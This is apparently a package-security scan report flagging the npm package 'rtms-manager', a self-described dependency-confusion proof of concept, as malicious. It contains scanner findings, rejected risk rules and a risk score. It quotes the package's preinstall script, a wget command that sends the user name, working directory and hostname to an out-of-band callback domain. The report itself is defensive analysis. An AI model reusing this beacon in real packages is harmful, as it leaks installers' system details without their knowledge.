rtms-manager @1.4.0
Dependency Confusion poc
Maintainers
Risk Dispositions (2 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason |
|---|---|---|---|---|
| install-script:preinstall | install-scripts | reject | AI | AI (install-scripts): Self-described dependency confusion PoC; preinstall executes arbitrary code on install. |
| bogus-package | bogus-package | reject | AI | AI (bogus-package): Package is explicitly a PoC attack artifact, not a legitimate package. |
SAST Findings (3)
---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (c18da37bf0615d0c7dceb6be7eb89956f39de56bbc90f65d9398fbfb3f9455dc)

The package rtms-manager was found to contain malicious code.

## Source: ossf-package-analysis (d50c578dddb4a0cd216dd21c4432a54846daef2a4c41bd80aef2ca6a983dacd5)

The OpenSSF Package Analysis project identified 'rtms-manager' @ 1.2.0 (npm) as malicious. It is considered malicious because:

- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Script: wget --quiet "http://mymraonjbzjnkkyazwmtobvcuzvdfynr2.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 71. Findings: 1 critical (+40), 1 high (+25), 2 low (+6).
Published to npm: